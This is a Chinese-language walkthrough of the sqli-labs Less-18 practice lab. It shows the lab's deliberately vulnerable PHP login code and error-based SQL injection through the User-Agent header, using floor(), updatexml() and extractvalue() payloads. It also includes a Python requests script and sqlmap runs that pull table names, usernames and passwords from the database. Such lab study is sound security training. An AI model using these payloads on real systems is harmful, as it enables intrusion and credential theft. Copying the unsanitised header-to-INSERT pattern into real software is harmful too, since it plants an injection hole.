sqli-lab-less18
一、靶标地址
Less-18 POST-Header Injection - Uagent field -Error based
#响应头Useragent注入
http://127.0.0.1/sqli/less-18/
二、漏洞探测
输入1 1
得到post数据包
uname=1&passwd=1&submit=Submit
#发现回显Your IP ADDRESS is 127.0.0.1
三、源码分析
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,20);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
$uagent = $_SERVER['HTTP_USER_AGENT'];
#获取用户相关信息,包括用户浏览器、操作系统等信息。
$IP = $_SERVER['REMOTE_ADDR'];
#浏览网页的用户ip。
#$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。不能保证每个服务器都提供全部项目;服务器可能会忽略一些,或者提供一些没有在这里列举出来的项目
echo "<br>";
echo 'Your IP ADDRESS is: ' .$IP;
echo "<br>";
//echo 'Your User Agent is: ' .$uagent;
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname = check_input($_POST['uname']);#对uame和passwd都做了过滤
$passwd = check_input($_POST['passwd']);
/*
echo 'Your Your User name:'. $uname;
echo "<br>";
echo 'Your Password:'. $passwd;
echo "<br>";
echo 'Your User Agent String:'. $uagent;
echo "<br>";
echo 'Your User Agent String:'. $IP;
*/
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Agent:'.$uname."\n");
fclose($fp);
$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
#简化为select username,password from users where username=$uname and password=$passwd order by id desc limit 0,1;
#desc为降序
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)#如果查询到,意味着这种方式也需要知道一个合法用户
{
echo '<font color= "#FFFF00" font size = 3 >';
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
#向数据库security的uagents表插入三个字段值
mysql_query($insert);
//echo 'Your IP ADDRESS is: ' .$IP;
echo "</font>";
//echo "<br>";
echo '<font color= "#0000ff" font size = 3 >';
echo 'Your User Agent is: ' .$uagent;//输出useragent
echo "</font>";
echo "<br>";
print_r(mysql_error()); //否则语法执行失败打印错误,ip和uname都做了处理,只能在uagent上
echo "<br><br>";
echo '<img src="../images/flag.jpg" />';
echo "<br>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());//打印错误
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
四、黑盒与白盒测试
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1'
#Your User Agent is: 1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1')
Your User Agent is: 1')
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '', '127.0.0.1', 'admin')' at line 1
Postdata:
uname=admin&passwd=admin&submit=Submit
UserAgent:
1'))
#Your User Agent is: 1'))
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')', '127.0.0.1', 'admin')' at line 1
猜测不出语句,只能知道会出现报错
在实际猜测中最好对' ') '))都进行测试
1、floor()函数报错
#获取数据库 用户 版本号
UserAgent:
1' and (select 1 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#因为update语句无法使用union select,所以用and并将后面()
#获取表名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取列名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
#获取用户名
UserAgent:
1' and (select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '
2、updatexml()函数报错
insert into uagents (`uagent`, `ip_address`, `username`) values ('$uagent', '$IP', $uname);
#获取数据库名
UserAgent:
1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '
#insert into uagents (`uagent`, `ip_address`, `username`) values ('1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '', 'a', 'b');
#后面是and'的原因是需要闭合前后两个引号,保证values后面的参数格式
#第一个参数是'1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and ''
select '1' and '2' and '3';
#1
#获取数据库名的第二种方式仅供参考
#补充一点:这里并不是URL而是HTTP头,所以+并不会被转义为(空格),于是末尾的注释符号要变为#。
1' or updatexml(1,concat('#',(database())),0),' ',' ')#
1' and updatexml(1,concat('#',(database())),0),' ',' ')#
#这里是直接补充了value的两个空参数
#获取表名
UserAgent:
1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) and '
#获取列名
UserAgent:
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) and '
#获取列字段
UserAgent:
1' and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) and '
3、extractvalue()函数报错
#获取当期数据库名
UserAgent:
1' and extractvalue(1,concat(0x7e,(select database()))) and '
#获取表名
UserAgent:
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
#获取列名
UserAgent:
' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) and '
#获取列字段
UserAgent:
1' and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) and '
UserAgent:
1' and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) and '
五、脚本撰写
import requests
url="http://192.168.128.159/sqli/less-18/index.php"
#F12查看或者burpsuite抓包
header={
'User-Agent': "1' and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) and '",
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload = {
"uname" : "admin",
"passwd" : "admin"
}
response=requests.post(url,headers=header,data=payload)
print(response.text)
六、sqlmap
sqlmap -u "http://192.168.128.159/sqli/Less-18/" --data "uname=admin&passwd=admin&submit=Submit" --user-agent="" --level 4 --batch
#未探测出
#lever>=3才会去检查user-agent头是否存在注入漏洞
sqlmap -r target.txt --level 4 --batch
#未探测出
或者
sqlmap -r target.txt --batch
#需要把User-Agent的值设置为*
#探测速度最快
Parameter: User-Agent #1* ((custom) HEADER)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ' AND (SELECT 2412 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(2412=2412,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xOtp'='xOtp
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: ' AND (SELECT 6241 FROM (SELECT(SLEEP(5)))wmJd) AND 'IJbP'='IJbP
POST /sqli/less-18/ HTTP/1.1
Host: 192.168.128.159
Content-Length: 38
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.128.159
Content-Type: application/x-www-form-urlencoded
User-Agent: *
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.128.159/sqli/less-18/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
uname=admin&passwd=admin&submit=Submit
七、总结
1、需要提前爆破一个合法用户
2、目前掌握的报错函数回显语句包括
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";